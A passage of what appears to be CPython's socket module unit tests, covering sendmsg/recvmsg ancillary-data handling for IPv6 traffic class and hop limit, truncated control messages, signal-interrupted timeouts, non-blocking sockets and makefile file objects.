hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(None)
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(10)
self.assertTrue(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 10)
if fcntl:
# When a Python socket has a non-zero timeout, it's
# switched internally to a non-blocking mode.
# Later, sock.sendall(), sock.recv(), and other socket
# operations use a `select()` call and handle EWOULDBLOCK/EGAIN
# on all socket operations. That's how timeouts are
# enforced.
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
